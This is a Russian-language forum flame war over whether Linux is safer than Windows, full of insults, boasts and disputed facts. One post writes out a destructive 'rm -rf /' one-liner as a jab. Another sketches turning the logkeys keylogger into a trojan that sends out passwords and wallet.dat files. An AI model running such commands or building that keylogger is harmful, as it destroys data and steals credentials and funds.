Полностью согласен. Всему виной лишь пользователь запустивший программу под рутом/администратором, а разницы между операционками нет.

[Yaremi]

У меня Ubuntu. Которую за всё время проведения турниров по взлому, не разу не взломали.

Это не значит, что под неё нет вирусов. Есть они. Взломы тут ни при чём. Вирусы пишут для того, чтоб взламывать не нужно было.

Вирус технически не будет работать в убунде. Почему? Чтоб ему запустится, ему нужно ввести пароль. А пароль знаю только я. Поэтому вирусу нужно сначала взломать меня, а точнее мой мозг. А уже потом когда вирус получил пароль с моего мозга, ему нужно запустится и ввести пароль. Но вот беда. Чтоб ему запустится, ему нужно сделать себя исполняемым. А чтоб сделать себя исполняемым, ему нужно запустится. Поэтому ему кроме того, что, нужно получить пароль из моего мозга, ещё нужно заставить меня сделать его исполняемым, и только после этого вводить пароль.

В общем нет в убунде вирусов. А вирусов которые взломают мой мозг уж нет точно. Тут ещё можно поспорить, является такой вирус под убунду, или это вирус под человека?

Чувак, ничего взламывать не надо. Линукс используют точно такие же дебилы, как и виндовс и макинтош. Вирусная программа никогда не спрашивает пароль. Её присылают дебилу по имайлу, или другим способом, и он сам её запускает, часто от рута. Вылазь уже из эльфийского леса, и загляни правде в глаза, под твои люниксы вирусов такая же невъебенная куча, как и под микрософт.

Чтоб запустится и установится нужно получить пароль рута. Как она установится без пароля? нужно запросить пароль, чтоб я ввёл. И второе. В убунде в целях безопасности все файлы попадающие в неё не исполняемый. То есть они сами не запустятся, пока я сам лично не сделаю его исполняемым и запущу. Хотя, что тут объяснять. Я всё расписал в первом сообщение.

под твои люниксы вирусов такая же невъебенная куча, как и под микрософт.

Ахахаха, баттхерт, ещё и лютый. Почувствуй разницу.

Список всех вредоносных программ под линукс.

Черви:
Adm
Adore
Cheese
Devnull
Kork
Lapper
Ramen worm (Англ.)
Linux/Lion (Англ.)
Mighty
Slapper
Компьютерные вирусы:
42[9][10]
Arches[11]
Alaeada
Binom
Bliss
Brundle
Coin[12][13]
Dawn
Diesel
Hasher
Kagob
Lacrimae
Pilot
MetaPHOR (также известный как Simile)
OSF.8759
RST[14]
Staog
Siilov.5916
Vit.4096
Winter
Winux (также известный как Lindose или PEElf)
ZipWorm
Троянские программы:
Kaiten — Linux.Backdoor.Kaiten
Rexob — Linux.Backdoor.Rexob

А вот сколько их в быдло-винде?   Больше миллиона.

32 вируса и миллион. =

невъебенная куча, как и под микрософт

Объективное сравнение.

Винда дрявая фигня в плане безопасности. Взгляни в правде в глаза.

[Yaremi]

Чувак, ничего взламывать не надо. Линукс используют точно такие же дебилы, как и виндовс и макинтош. Вирусная программа никогда не спрашивает пароль. Её присылают дебилу по имайлу, или другим способом, и он сам её запускает, часто от рута. Вылазь уже из эльфийского леса, и загляни правде в глаза, под твои люниксы вирусов такая же невъебенная куча, как и под микрософт.

Полностью согласен. Всему виной лишь пользователь запустивший программу под рутом/администратором, а разницы между операционками нет.

есть, в винде можно закинуть вирус и запустится он сам. Без пользователя. В линуксе так нельзя. Вот и вся разница.

[2btx]

openbsd и solaris это не линукс. У меня Ubuntu. Которую за всё время проведения турниров по взлому

А что же тогда это за системы... ? uname -a сделайте.

На турнирах по взлому =))) ааа ну ладно. А вы сколько там взломали всего? Вообще кто то что то взломал?

Самый банальный "вирус" или "троян" допустим logkeys скачайте исходники и добавьте отправку на почту или гейт, пересылку файлов или еще, что нужно ... например поиск файла wallet.dat и отправку кейлогером вашего чудо пароля. Все это чудесно работает.

Единственным чем более узявим win это его распространенностью, доставка вредоносного кода на компьютер, если это массово, доставляется через браузер, для этого тысячи людей каждый день ищат уязвиости на самый популярный браузер... для того что запустить вредносное по на nix like тачках вам нужны права root, заметьте ваш пароль нахер не каму не нужен, нужны права, так вот для nix like систем для локального повышения прав, эксплойтов в десятки раз больше чем для win. Глупо думать что выбор ОС, как то влияет на вашу безопасность.

есть, в винде можно закинуть вирус и запустится он сам. Без пользователя. В линуксе так нельзя. Вот и вся разница.

закинуть =))) запуститься ? это вас на турнере научили ?

hxxps://ru.wikipedia.org/wiki/Переполнение_буфера

без ползователя =))) в "линюкс" даже есть такой пользователь, называется никто cat /etc/passwd | grep nobody && rm -rf /

[Yaremi]

openbsd и solaris это не линукс. У меня Ubuntu. Которую за всё время проведения турниров по взлому

А что же тогда это за системы... ? uname -a сделайте.

На турнирах по взлому =))) ааа ну ладно. А вы сколько там взломали всего? Вообще кто то что то взломал?

Самый банальный "вирус" или "троян" допустим logkeys скачайте исходники и добавьте отправку на почту или гейт, пересылку файлов или еще, что нужно ... например поиск файла wallet.dat и отправку кейлогером вашего чудо пароля. Все это чудесно работает.

Единственным чем более узявим win это его распространенностью, доставка вредоносного кода на компьютер, если это массово, доставляется через браузер, для этого тысячи людей каждый день ищат уязвиости на самый популярный браузер... для того что запустить вредносное по на nix like тачках вам нужны права root, заметьте ваш пароль нахер не каму не нужен, нужны права, так вот для nix like систем для локального повышения прав, эксплойтов в десятки раз больше чем для win. Глупо думать что выбор ОС, как то влияет на вашу безопасность.

есть, в винде можно закинуть вирус и запустится он сам. Без пользователя. В линуксе так нельзя. Вот и вся разница.

закинуть =))) запуститься ? это вас на турнере научили ?

hxxps://ru.wikipedia.org/wiki/%D0%9F%D0%B5%D1%80%D0%B5%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5_%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B0

О как всё запущено.

А теперь изучаем. Что это за турнир и кто в нём участвует.

DEF CON (также пишется как DEFCON или Defcon) — крупнейшая в мире конференция хакеров, каждый год проводящаяся в Лас-Вегасе, штат Невада. Первый DEF CON прошёл в июне 1993 года. В 2012 году на DEFCON собралось приблизительно 13000 посетителей.

Большинство слушателей на DEFCON составляют профессионалы по компьютерной безопасности, журналисты, юристы, федеральные государственные служащие и хакеры с основным интересом в компьютерных программах и компьютерной архитектуре.[1] Событие состоит из различных выступлений о компьютерах и темах относящихся к хакингу, а также социальных событий и конкурсов от создания самого долгого Wi-Fi соединения и взлома компьютерных систем, до конкурса на тему кто сможет наиболее эффективно охладить пиво во время жары. Другие соревнования включают в себя взлом паролей различной сложности, конкурсы относящиеся к роботам, искусству, слоганам, кофейным войнам, а также Захват флага - конкурс, где команды хакеров пытаются атаковать и защищать компьютеры и сетей при помощи определенного программного обеспечения и сетевых структур. CTF проводится и на других хакерских конференциях, как в научном так и в военном контексте.

Подробнее. https://ru.wikipedia.org/wiki/DEFCON_%28%D0%BA%D0%BE%D0%BD%D1%84%D0%B5%D1%80%D0%B5%D0%BD%D1%86%D0%B8%D1%8F%29#2012

Я бы дальше мог с вами поспорить если бы не этот эпик фейл:

А что же тогда это за системы... ? uname -a сделайте.

Если вы даже не знаете, что такое openbsd и solaris.... И думаете что это линукс. Что как бы намекает о вашей осведомленность в этом вопросе.. Которую можно оценить нулевой.

OpenBSD 4.4BSD — BSD-реализации UNIX-системы. И линуксом там даже и не пахнет.

А solaris вообще UNIX System V Release 4 (SVR4) и линуксом там тоже не пахнет.

В общем. Маны, много манов. Очень много манов. И читать, читать, и ещё раз читать.

[2btx]

ага а теперь напиши то же самое по linux, redhat, centos, debian и др. популярных дистрибютивов, и найдите общее слово. А потом зайдите на википедию и введите в поиске linux. И расскажите про турнир, очень интересно послушать.


---- add

И в каком же городе вы были на дефконе ?

[Yaremi]

ага а теперь напиши то же самое по linux, redhat, centos, debian и др. популярных дистрибютивов, и найдите общее слово. А потом зайдите на википедию и введите в поиске linux. И расскажите про турнир, очень интересно послушать.

redhat, centos, debian это дистрибутивы линукса. Они работают на ядре линукс. Ядро это и есть линукс. А redhat, centos, debian это ядро линукс + улиты и графическая оболочка.

Openbsd - основана на ядре bsd. BSD это отдельный проект ни как не связанный с линуксом. Это как браузер хром и интернет экспловер. абсолютно разные браузеры.

А солярис вообще отдельная операционка. Написана в своё время очень хорошей компанией. SUN. оракл её поглотил. про програму виртуалбокс слышали? Это sun подарил её нам. И сделал её бесплатной.

Собираются со всего мира специалисты. Выступают. Потом проводят турниры. По браузерам. По операционным системам. Как я помню по браузерам.

Хром, экспловер, фаирфокс и сафари.

А по операционкам

виндовс, убунду, мак ос, андроид и iOS.

И кто быстрей взломает тот и победил. В общем на википедии всё написано. И в гугле можно найти отчёты на новостных и хакерских сайтах.

[2btx]

Ладно, не буду вас дальше тролить...
Не на каком дефконе вас не было, да и на хакер дейс вы бы не пошли так как нечего не поняли...

Хватит выдумывать и передергивать. Ваши знания в безопасности раны не нулю конечно как вы заявили про меня. Но далее продвинутого пользователя, апагей ваших знаний участи в холиваре под названием: "Что безопаcнее nix win mac".

Удачи.

Proof.

hxxp://www.ibm.com/developerworks/ru/library/au-unix-difflinux/

открою вам секрет android относиться nix like системам.

[yvv]

невъебенная куча, как и под микрософт

Объективное сравнение.

Винда дрявая фигня в плане безопасности. Взгляни в правде в глаза.

Это объективное сравнение основано на рассылках отдела безопасности моей компании. Закончишь школу, пойдёшь работать, тебя тоже отдел безопасности будет охранять, а не линукс.

Твой и мой личные компьютеры просто нахуй никому не нужны. Поэтому у нас всё хорошо. А в моей компании етсь несколько HPC кластеров, все под линуксом. Десктопы у персонала под виндой, под маками, под линуксом, кому что нравится. Атакуется всё это хозяйство регулярно. Вирусов для всех операционок существует - невъебическое множество.

Что касается домашних десктопов, то под они виндой атакуются чаще, чем линуксы, просто потому что их на порядки больше. У большинства людей на домашних компутерах кроме селфи порнухи ничего больше нет, но иногда люди кошельки с тысячами биткойнов держат и другую ценную информацию. Вот это последнее и есть цель для хакеров. И их не ебёт, линукс у тебя, или не линукс. Они с люниксами прекрасно справляются.

[Yaremi]

Ладно, не буду вас дальше тролить...
Не на каком дефконе вас не было, да и на хакер дейс вы бы не пошли так как нечего не поняли...

Хватит выдумывать и передергивать. Ваши знания в безопасности раны не нулю конечно как вы заявили про меня. Но далее продвинутого пользователя, апагей ваших знаний участи в холиваре под названием: "Что безопаcнее nix win mac".

Удачи.

Proof.

hxxp://www.ibm.com/developerworks/ru/library/au-unix-difflinux/

открою вам секрет android относиться nix like системам.

Я не писал, что я был дефконе.

И ничего не передёргивал. Я написал как есть. И не троллил в отличи от вас. А То, что вы ноль. В этом нет сомнения. И путать линукс и юникс ваш удел.

А насчёт андроида, открою вам тоже секрет. Он не просто unix like система. А использует ядро ос линукс.

Просто кто-то относится фанатично к виндовсу. Я даже вижу причину. Причина завышенный ЧВС. Я такой супер умный (вокруг меня земля крутится) и использую виндовс. Но тут появляется некто и говорит, что он на линуксе потому-что он безопасней. И тут, вынос шаблона и ошибка буфера ЧВС и как результат вот этот срач.

[Yaremi]

невъебенная куча, как и под микрософт

Объективное сравнение.

Винда дрявая фигня в плане безопасности. Взгляни в правде в глаза.

Это объективное сравнение основано на рассылках отдела безопасности моей компании. Закончишь школу, пойдёшь работать, тебя тоже отдел безопасности будет охранять, а не линукс.

Твой и мой личные компьютеры просто нахуй никому не нужны. Поэтому у нас всё хорошо. А в моей компании етсь несколько HPC кластеров, все под линуксом. Десктопы у персонала под виндой, под маками, под линуксом, кому что нравится. Атакуется всё это хозяйство регулярно. Вирусов для всех операционок существует - невъебическое множество.

Что касается домашних десктопов, то под они виндой атакуются чаще, чем линуксы, просто потому что их на порядки больше. У большинства людей на домашних компутерах кроме селфи порнухи ничего больше нет, но иногда люди кошельки с тысячами биткойнов держат и другую ценную информацию. Вот это последнее и есть цель для хакеров. И их не ебёт, линукс у тебя, или не линукс. Они с люниксами прекрасно справляются.

Закончишь школу бла-бла-бла.. Этим можно было и закончить сообщение. такое начало просто прямое свидетельство неадекватности. Я уже никогда не пойду работать, тем более на компанию. Я себя могу сам обеспечить уже долгое время. И могу зарабатывать деньги сам и своей головой. И это не работа, а любимое дело. А если ваша компания говно. Это проблема вашей компании. У меня куча удалённых серверов. Много нод. И на всех крутятся деньги. И все они публичные. Но не один прыщавый хакер не смог их взломать. Хотя пытались тысячу раз. мой верный пёс iptables и правила мной написаны отправляют их на три буквы чуть более, чем полностью. Увольте сис-админа возьмите нормального.

Меня с 2006 года никто не взламывал и не взломает. отсосёт несколько раз в припрыжку. А мой десктоп с кошельками, вообще не увидит даже во сне. И прекрасно они соснут ласунца, а не справятся с мои линуксом.

А то, что у большинства кроме порнухе ничего нету.. Устаревшая информация. Сейчас у большинства банковские карточки с возможностью управлять балансом через сайт. Почти в каждой второй почте взрослого человека можно найти скан паспорта и другие документы. К тому-же для хакеров любой десктоп = нажива. Даже банальное использование его в ботнете.

ЧВС снизите, успокойтесь. В этом мире всегда найдётся что-то лучше, то что используете вы. И всегда найдётся кто-то лучше вас.

Не забудьте просканировать винду на вирусы)) Или быть может пришло время переустановить шиндос?

[Yaremi]

Вот до чего доводит фанатическое отношения к вещам.

Им пишешь, что никто не взлом. А они как бараны упёрлись и утверждают, что взламывают пачками.

Им говоришь, что вирусов под линукс 32 штуки. (и то, вирусами их трудно назвать) нет они утверждают что их миллионы.

Не предоставив не одного факта.

И самое главное, что показывает первопричину.

Чувак, ничего взламывать не надо. Линукс используют точно такие же дебилы, как и виндовс и макинтош

То что есть дебилы и в линуксе я не спорю. Но это сообщение можно расшифровать так. (автор не осознанно изложил это в этом тексте)

Вот так

Я не могу принять то, что линукс безопасней виндуса, и его используют более умные люди, потому-что я использую виндовс и умней меня никого нет. (мир то вокруг меня крутится)

Думаю, мне больше сказать нечего. Тут только осталась работа для психотерапевта.

Не относитесь фанатично к вещам. Это деструктивно влияет на вас. Вот из-за фанатического отношения к чему-то. Некоторые даже прыгают с крыши и вешаются (см. Любовь)

Ребята, вы несведомые часом? (ладно шучу).

[FAN]

сколько буков начепятали....
о названиях и различиях осей можно почитать в умных источниках...
а хакнуть любой живой мозг можно при помощи старого дедовского паяльника...

[2btx]

.... По факту.

Ты пишешь про турнир, и что на каком то турнире, и заявляешь что на не ты не был, но там не разу не была взломана os Ubuntu, потом погуглив и найдя самый известный ты пишешь, что это то про дефкон... Откуда ты знаешь что там не разу не было взломана Ubuntu? ставлю 100$, что была взломана более 100 раз. (hxxp://www.exploit-db.com/search/?action=search&filter_description=ubuntu) ----------- Это передергивание фактов.

Путал linux и unix ты, я это понял, и написал понятным тебе языком (заметь кавычки "линюкс"). Если ты хочешь докапываться к названиям то Ubuntu напрямую имеет отношение к Debian. Unix это опен сорс проект, приведу тебе пример на уровне bitcoin-qt это тоже опен сорс проект, есть около 200 клонов (форков), все они не нарушая не какой закон используют код bitcoin-qt, кто то не изменил нечего, кто изменил картинку или тип алгоритма. При этом я могу сказать что все этим системы bitcoin-qt like. Так вот дело не в том как я буду их называть дело в том, что я понимаю что есть что. Linux, Ubuntu, Debian, Cent OS, Android, Mac OS, OpenBSD, FreeBSD, Solaris и еще милионы комерческих версий это UNIX изменеый перестроенный с закрытым и открытым кодом. Но его объеденяет одно, все эти системы работают как unix like, имеют определенный файловое древо, логику, набор команд и утилит, к ним подходит одно и тоже ПО, они одно и то же, их делали разные разные люди и по разному назвали. Но если ты понимаешь как это работает внутри, а не тупо тыкаешь по иконкам в kde или ghome, то все становится на свои места.

Про твои знания в IT, я не буду коментировать.

По поводу того, какую os я использую. С чего ты взял что это win ?
У меня несколько домашних станций и ноутбуков, как win так и с mac, есть пару виртуалок, с Kali и Debian. В качестве серверного ПО я использую Cent OS и FreeBSD, так же я счасливый пользователь android и iOS. Меня возмутило не то что ты думаешь, что безопасность зависит от выбора OS. И как большинство не далеких пользователей, установив себе nix ты решил похвастаться о епт установи ubuntu как я и будет тебе счастье, хотя это не так. Мое мнение что каждая ОС, для своего. А безопасность это в первую очередь бдительность, а не надежда на чужой код. А бомбануло меня, после такого как ты написал про взлом и про турнир, и по факту откровенно пиздите не зная фактов и вводя в заблуждение людей, вот это мне  нравиться, а не то что вы что то написали про win, что она дырявая и так знают все, спросите у любого школьника или даже детсадовца, это не новость.

[2btx]

Ребята, вы несведомые часом? Grin (ладно шучу).

Шутку не понял, разъясни.

[yvv]

Я уже никогда не пойду работать, тем более на компанию. Я себя могу сам обеспечить уже долгое время.

Мамка хоть на мороженое выдаёт?

Меня с 2006 года никто не взламывал и не взломает. отсосёт несколько раз в припрыжку.

А моего старого приятеля, Неуловимого Джо, который нахуй никому не нужен, уже 200 лет никто поймать не может.

Смешной ты, школьник.

[Yaremi]

О как вас прорвало.

Уже и ссылки дал. а нет. Не излечимы.

Все ровно у них solaris и openbsd - линукс. Ты мой юный друг, сам лично написал, что solaris и openbsd это линукс. Заметь не unix ты написал, а линукс.

Может у вас дерево это камень?

И опять куча бреда. Я больше тебе ссылок не дам. Бери и гугли если нужно.

А yvv вообще лузер. Уделался в штаны как меленький ребёнок и включил пластинку = школьник, школьник...

yvv,

Твоя работа - это не ты сам,
Как и твои деньги в банке,
И твоя машина,
Как и твой бумажник,
И твоя одежда.
Ты - лишь раб в чужой жизни.

И компания твоя говно.

Давайте напишите ещё хуйни.  Типо школьник школьник ко-ко-ко.

Или solaris это линукс. Ты путаешь unix с линуксом. (это вообще прел) Закину пожалуй на linux.org.ru эти перлы. Хай линуксоиды поржут.

На всех серьёзных серверах стоит линукс. гугл, яндекс и т.д. Потому-что линукс безопасней винды. А не потому-что гуглу и яндексу так захотелось. Но что вам объяснять.

так, у то. Как селёдка об лёд.

[yvv]

Ты - лишь раб в чужой жизни.

А ты в чьей жизни раб, расскажи? В мамкиной? Она что, даже девочку не пускает без разрешения в свой дом? Ну хотя бы чтоб вы вместе мороженого покушали? Или покрасноглазили над линуксом вдовём минуточку?

[Mr.Anonymous]

...
Так вот дело не в том как я буду их называть дело в том, что я понимаю что есть что. Linux, Ubuntu, Debian, Cent OS, Android, Mac OS, OpenBSD, FreeBSD, Solaris и еще милионы комерческих версий это UNIX изменеый перестроенный с закрытым и открытым кодом. Но его объеденяет одно, все эти системы работают как unix like, имеют определенный файловое древо, логику, набор команд и утилит, к ним подходит одно и тоже ПО, они одно и то же, их делали разные разные люди и по разному назвали. Но если ты понимаешь как это работает внутри, а не тупо тыкаешь по иконкам в kde или ghome, то все становится на свои места.
...
Меня возмутило не то что ты думаешь, что безопасность зависит от выбора OS.
...
Мое мнение что каждая ОС, для своего. А безопасность это в первую очередь бдительность, а не надежда на чужой код.

Впечатление что аргументация скатывается на такой уровень: "в С++ гораздо больше плюсов чем в Си ...".

2btx, без обид, но возникло стойкое ощущение что Вы "плаваете" в теме (особая "претензия" вот к этому вашему заявлению: "Linux, Ubuntu, Debian, Cent OS, Android, Mac OS, OpenBSD, FreeBSD, Solaris и еще милионы комерческих версий это UNIX изменеый перестроенный с закрытым и открытым кодом.")

[Yaremi]

Ты - лишь раб в чужой жизни.

А ты в чьей жизни раб, расскажи? В мамкиной? Она что, даже девочку не пускает без разрешения в свой дом? Ну хотя бы чтоб вы вместе мороженого покушали? Или покрасноглазили над линуксом вдовём минуточку?

В том и дело что, ни в чьей. И не прикрываюсь дядькой каким-та или компанией. Хотя, какая там компания? Контора, хотя если тебе вообще есть 18 лет. ладно шучу. Не ну ты вроде не врёшь.

А вот твой кент 2btx. Лжец, тролль и девственник.

[FAN]

кардинальная разница между них и вин осями - у них все закрыто подефолту, а у вин все открыто подефолту...

[fsb4000]

За 2014 год

[Sundoor]

За 2014 год

Все на висту самая безопасная

[Asatur]

кардинальная разница между них и вин осями - у них все закрыто подефолту, а у вин все открыто подефолту...

Самый точный коммент из всех. И винду можно сделать сверхбезопасной, если в ней покопаться, и линукс будет обычной дыркой во многих руках.

PS: Кстати, какое это всё имеет отношение к теме?

[Mr.Anonymous]

кардинальная разница между них и вин осями - у них все закрыто подефолту, а у вин все открыто подефолту...

Самый точный коммент из всех.

Вам показалось.

И винду можно сделать сверхбезопасной, если в ней покопаться, и линукс будет обычной дыркой во многих руках.

Это такая слепая вера?
CVE-2011-2013 (невероятно легко запоминается)

PS: Кстати, какое это всё имеет отношение к теме?

Косвенное.

[Asatur]

CVE-2011-2013 (невероятно легко запоминается)

https://technet.microsoft.com/ru-ru/library/security/ms11-083.aspx

[Mr.Anonymous]

CVE-2011-2013 (невероятно легко запоминается)

https://technet.microsoft.com/ru-ru/library/security/ms11-083.aspx

Что изменилось-то?

Ваши ложные утверждения обрели истинность?

[Asatur]

Всего лишь факт, что указанную дырку давно залепили.

[Mr.Anonymous]

Всего лишь факт, что указанную дырку давно залепили.

И? Теперь ваши утверждения обрели истинность?

[Asatur]

И? Теперь ваши утверждения обрели истинность?

Они и не переставали быть таковыми.
Вообще такая реакция, как будто тебя лично задели. Интересный случай.

[Mr.Anonymous]

И? Теперь ваши утверждения обрели истинность?

Они и не переставали быть таковыми.

Вы всегда мыслите столь поверхностно? Вот хоть поняли к чему был приведен CVE-2011-2013 ?

Вообще такая реакция, как будто тебя лично задели. Интересный случай.

Ничего интересного на самом деле. Но это очень показательно как вы переводите ситуацию на реакцию анонима.

[Asatur]

Вы всегда мыслите столь поверхностно? Вот хоть поняли к чему был приведен CVE-2011-2013 ?

Я всегда мыслю и этого достаточно. А вы знакомы с понятием относительности? Вы привели пример дырки. Хорошо. Я тоже приведу. Вот, к примеру, есть Мр. Аноним и у него между ног есть дырка. Значит, он в некотором смысле женщина, если упомянуть это в разговорной речи без более глубокого описания. Он женщина относительно пенька на поляне, например. А вот относительно других людей он всё-таки не совсем женщина, так как у них в наличие больше одной дырки между ног. Надеюсь, что вы поняли к чему были приведены примеры дырок?

Вообще такая реакция, как будто тебя лично задели. Интересный случай.

Ничего интересного на самом деле. Но это очень показательно как вы переводите ситуацию на реакцию анонима. [/quote] Действительно, случай не только интересный, но и очень показательный.

И таки объясните без односложных отписок - какое это имеет отношение к теме?

[theclan]

кончайте уже оффтопить, у анонима на лбу написано что он дятел и тролль, причём сильно толстый, и непонятно к чему он вообще это сюда пишет. достаточно заглянуть в его сообщения и посмотреть на манеру общения
или закройте уже тему, если от автора ничего нового больше не будет

[Asatur]

кончайте уже оффтопить, у анонима на лбу написано что он дятел и тролль, причём сильно толстый, и непонятно к чему он вообще это сюда пишет. достаточно заглянуть в его сообщения и посмотреть на манеру общения

"ну да так-то"

или закройте уже тему, если от автора ничего нового больше не будет

[Mr.Anonymous]

кончайте уже оффтопить, у анонима на лбу написано что он дятел и тролль, причём сильно толстый, и непонятно к чему он вообще это сюда пишет. достаточно заглянуть в его сообщения и посмотреть на манеру общения
или закройте уже тему, если от автора ничего нового больше не будет

Если я тролль, то ты - лох. Причем глупее чем обычный среднестатистический. И вообще непонятно почему ты полез комментировать если понять не смог что происходит (это "лирическое отступление", т.к. на самом деле тут нечего понимать).

Понять что ты лох совсем не сложно - достаточно прочесть процитированное мной твое сообщение, и путем оценки твоей манеры анализировать очень легко понять уровень ваших умственных способностей. Все как на ладони, но ведь тебе ничерта не понятно, верно?

Ты думаешь паритет? - А вот и нет: ты на самом деле глуп. С тобой вопрос закрыт: приходи когда подрастешь. А сейчас не путайся под ногами и не мешай дяденькам разговаривать.

[Mr.Anonymous]

Asatur, почините пожалуйста квотирование в сообщении #82, и будьте впредь внимательнее в следующий раз. Как поправите - отвечу на него.

кончайте уже оффтопить, у анонима на лбу написано что он дятел и тролль, причём сильно толстый, и непонятно к чему он вообще это сюда пишет. достаточно заглянуть в его сообщения и посмотреть на манеру общения

"ну да так-то"

или закройте уже тему, если от автора ничего нового больше не будет

Это доказательство того что ваша принадлежность к стаду временами берет вверх над здравым смыслом? - Впрочем, какая разница..

[becool]

За 2014 год

А вот это наглый вброс дерьма в вентилятор.
А ведь я даже повелся невнимательно посмотрев.
Но вот **ядь в источнике (который ты предусмотрительно не указал а только фотку? )сказано под фоткой, что автор сознательно не добавил во первых андроид, во вторых винду всё разделил по версиям, а операционки эпл и ядро линукс объединил воедино.
Это делал **аный тролль, целью которого было дискредитировать всё кроме винды.
А осоебенно продукцию эпла.
И я замечаю ты не первый такой вброс делаешь, где-то я ловил уже и отвечал.
Вспомнил как ты до этого подобную картинку табличку давал о почти таких же возможностях шела винды как у линукса.
А табличка сознательно составлена изходя из тех команд которые в винде есть.
Конечно сразу ниже поклонники винды в коментах стали писать что там у всех версий дыры одинаковы, но как проверить и почему так не сделали исследование тогда?
Опять же какие версии ядра линукс и эпла тогда там рассматривали?
Разделили винду по версиям чтобы выкинуть старые дыры?
А линуксы и эплы все старые оставили специально?
Пусть бы тогда делали конкретно лишь версии которые были в большей поддержки за последние 5 лет или три года допустим и т.д.
Кроме того как можно сравнивать платную поддержку и бесплатную вообще?
Платно поддерживают пока деньги есть, они бы ни одной дыры не закрыли отключив финансирование.
А линукс дыры затыкает в условиях изначального отсутствия финансирования как такового. (если в целом и гарантированое брать)
Ну ладно сравнили и сравнили, потому что результат примерно одинаков.
Но может тогда надо выкинуть от туда допустим не только старые версии но и мало поддерживаемые?
Если я допустим сейчас сделаю свою копию линукса и нахерачу там своих 100 багов туда впихну и раздам 1000 человек они тоже включат в результаты?

Это всё сраный подлог виндузятников и вообще проприетарщиков, проплаченый, как обычно.

Но насчет количества багов как таковых и базы эксплойтов спасибо.
Тоже помогает задуматься.

[fsb4000]

Опять becool нихуя не понял и начал холивар.
Смысл этого поста, что и Mac и в Linux есть уязвимости. И то что вы пишете "Установи Linux и будет безопастность, а Windows хакнет любой школьник" полный пиздёж. Во-первых ты becool неспособен хакнуть Windows, видимо детсадовец.(мой IP 5.166.106.143, Windows, хакай) Во-вторых, то что находится уязвимости в Linux, доказывает что вполне могли хакнуть, используя те уязвимости пока они не были пофиксены.

[becool]

Опять becool нихуя не понял и начал холивар.
Смысл этого поста, что и Mac и в Linux есть уязвимости. И то что вы пишете "Установи Linux и будет безопастность, а Windows хакнет любой школьник" полный пиздёж. Во-первых ты becool неспособен хакнуть Windows, видимо детсадовец.(мой IP 5.166.106.143, Windows, хакай) Во-вторых, то что находится уязвимости в Linux, доказывает что вполне могли хакнуть, используя те уязвимости пока они не были пофиксены.

Во первых откуда столько агрессии на меня?
Я пишу про картинку которую ты дал, ты начинаешь в ответ поливать меня, моды у бальтазара набрался?
Пи**ец.
Не ребят, с вами каши не сваришь точно, а я к тебе хорошо относился.
В принципе дальше можно было бы ничего не отвечать уже исходя из этого.
Потому что когда с человеком говоришь по какой-то теме а он начинает переходить на личности да ты мол чмо и т.д. то разговаривать дальше безсмыслено.
Установи линукс и будет больше безопастности в варианте из коробки, не значит что установи линукс и будет 100% безопастность.
Ты снова переврал.
Да, это как сравнить допустим мне дает человек винду серверную и винду обычную.
Я ставлю и ту и ту.
В обычной я пусть будет выбираю быть админом по как и большинство ее юзеров еще с 98ой винды по привычке, когда и фат то был не протоколируемым и в нем все были админом, и так и повелось короче.
И в другой тоже я так же делаю.
Как большинство юзеров.
Дальше мне серверная везде начинает предупреждать всё обновить надо - установить обновления.
Обычная тоже.
Если ввел купленый платный ключ.
А если нет? Крэк или активатор какой-то или заливка какая-то или какой-то там от хрюнделя пак с прогами, или с торента или ... или или или.. и все варианты вброса вирусни, но ладно сейчас не о том. Считаем или куплено или лицензия что поверяется контрольной суммой и серийный номер нормальный а для активации не треубется ничего запускать.
И вот я и там и там захожу админом.
и конечно же мне надо другой софт, я запускаю интернет эксплорер, ну должен так, в этой системе так устроено.
И вот тут начинается полный дисонанс если серверная!
Херак прелдупреждает админом запускать браузер нельзя, скрипты включить нельзя, то нельзя, это нельзя, скачать толком опять ничего нельзя, нихера се!
Вот о такой разницы защищенности установок при использовании из коробки обычным человеком и говорится.
Никто не говорит что так 100% защита, не надо вывирать слова.

"Во-первых ты becool неспособен хакнуть Windows,"
во первых переход на личности, в ответ на критику слов по теме.
Во вторых трольский лживый выверт.
Где я сказал что я могу и умею хакнуть?
Даже если не умею, то к чему это?
И даже если твоя винда защищена лучше чем винда из коробки, то к чему это?
Кто-то говорил что ты не можешь настроить винду?
Я что-то говорил о твоих способностях или неспособностях в этом плане?
Или ты просто решил перейти на оскорбления вот так вот и зах**чить вот таким нападком?
Кстати как кто-то тут выше вариантом
"а ты был на конференции хакеров"
Уровень перехода на личности и тролизма один и тот же.
Видно тут так принято в ру разделе форума.
Или вообще у русского быдла.

"неспособен хакнуть Windows, видимо детсадовец." еще один тролььский подстёб.
Я так разок подстебался над парнем, нашел в аське чела с номером все единицы и начал его стебать что он реально хакер или не реально и что он детсадовец а не хакер, ну что, он мне доказал, что реально не детсадовец и что-то в этом смыслет.
Ну я как бы понял что не надо так вы**ываться, и что тут детсадовец кто так вы**ывается.
Ладно один не может или не заденешь, но людей целая планета, нахера первого попавшегося человека в интернете без причины до**ываться. свой школизм проявлять.

"Во-вторых, то что находится уязвимости в Linux, доказывает что вполне могли хакнуть, используя те уязвимости пока они не были пофиксены."

так я и написал что спасибо дали инфу чего сколько и т.д. Ты чем смотришь и читаешь?

Я писал только по поводу картинки, нихера ничего не писал что я крутой хакер а кто-то ламер и т.д.
Вы**оны понты и переходы на личности пошли как раз в ответ.
Видна такова природа русского быдла, она по другому не умеет.
В том числе ботанского быдла, которое видимо тоже к общему быдлу относится.
Ну а может школьник конечно и у него школизм, х.з.
Но когда человеку говоришь по теме фотки что она липа что в ней не так. И что забрасывания такого фейка это вброс, а человек в ответ на личности переходит, то тут дело труба.
Это как бальтазар кто с фразы о NAT на личности переходит, идентичный случай.

[Yaremi]

Опять becool нихуя не понял и начал холивар.
Смысл этого поста, что и Mac и в Linux есть уязвимости. И то что вы пишете "Установи Linux и будет безопастность, а Windows хакнет любой школьник" полный пиздёж. Во-первых ты becool неспособен хакнуть Windows, видимо детсадовец.(мой IP 5.166.106.143, Windows, хакай) Во-вторых, то что находится уязвимости в Linux, доказывает что вполне могли хакнуть, используя те уязвимости пока они не были пофиксены.

Ахаха, теперь тебя рвануло. В другом топике бравые ребятишки не предоставив не одного факта соснули у меня хуйца.

Да. Я утверждаю, что установив линукс, безопасность повышается на 90%. Это тебе скажет любой хакер. Тот кто занимается взломом. Не веришь? Сходи к ним в унион и спроси.

